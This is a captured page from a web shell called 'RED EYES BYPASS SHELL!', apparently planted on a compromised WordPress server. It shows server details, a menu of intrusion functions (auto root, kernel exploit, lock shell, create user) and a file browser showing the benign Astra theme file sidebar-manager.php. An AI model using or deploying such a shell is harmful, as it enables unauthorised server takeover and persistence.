Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
themes /
astra /
inc /
core /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
builder
[ DIR ]
drwxr-xr-x
deprecated
[ DIR ]
drwxr-xr-x
markup
[ DIR ]
drwxr-xr-x
class-astra-admin-helper.php
2.07
KB
-rwxr-xr-x
class-astra-admin-settings.php
26.15
KB
-rwxr-xr-x
class-astra-attr.php
2.64
KB
-rwxr-xr-x
class-astra-enqueue-scripts.php
26.41
KB
-rwxr-xr-x
class-astra-icons.php
13.88
KB
-rwxr-xr-x
class-astra-theme-options.php
34.5
KB
-rwxr-xr-x
class-astra-walker-page.php
4.55
KB
-rwxr-xr-x
class-astra-wp-editor-css.php
64.84
KB
-rwxr-xr-x
class-gutenberg-editor-css.php
79.39
KB
-rwxr-xr-x
class-theme-strings.php
5.08
KB
-rwxr-xr-x
common-functions.php
67.62
KB
-rwxr-xr-x
index.php
111
B
-rwxr-xr-x
sidebar-manager.php
2.2
KB
-rwxr-xr-x
theme-hooks.php
8.94
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sidebar-manager.php
<?php /** * Sidebar Manager functions * * @package Astra * @link https://wpastra.com/ * @since Astra 1.0.0 */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } /** * Site Sidebar */ if ( ! function_exists( 'astra_page_layout' ) ) { /** * Site Sidebar * * Default 'right sidebar' for overall site. */ function astra_page_layout() { $supported_post_types = Astra_Posts_Structure_Loader::get_supported_post_types(); if ( is_singular() ) { // If post meta value is empty, // Then get the POST_TYPE sidebar. $layout = astra_get_option_meta( 'site-sidebar-layout', '', true ); // If post meta value is empty or in editor and sidebar set as default. if ( empty( $layout ) ) { $post_type = strval( get_post_type() ); if ( in_array( $post_type, $supported_post_types ) ) { $layout = astra_get_option( 'single-' . $post_type . '-sidebar-layout' ); } if ( 'default' === $layout || empty( $layout ) ) { // Get the global sidebar value. // NOTE: Here not used `true` in the below function call. $layout = astra_get_option( 'site-sidebar-layout' ); } } } else { if ( is_search() ) { // Check only post type archive option value. $layout = astra_get_option( 'archive-post-sidebar-layout' ); $search_sidebar_layout = astra_get_option( 'ast-search-sidebar-layout', 'default' ); $layout = 'default' !== $search_sidebar_layout ? $search_sidebar_layout : $layout; if ( 'default' === $layout || empty( $layout ) ) { // Get the global sidebar value. // NOTE: Here not used `true` in the below function call. $layout = astra_get_option( 'site-sidebar-layout' ); } } else { $post_type = astra_get_post_type(); $layout = ''; if ( in_array( $post_type, $supported_post_types ) ) { $layout = astra_get_option( 'archive-' . $post_type . '-sidebar-layout' ); } if ( 'default' === $layout || empty( $layout ) ) { // Get the global sidebar value. // NOTE: Here not used `true` in the below function call. $layout = astra_get_option( 'site-sidebar-layout' ); } } } return apply_filters( 'astra_page_layout', $layout ); } }
Close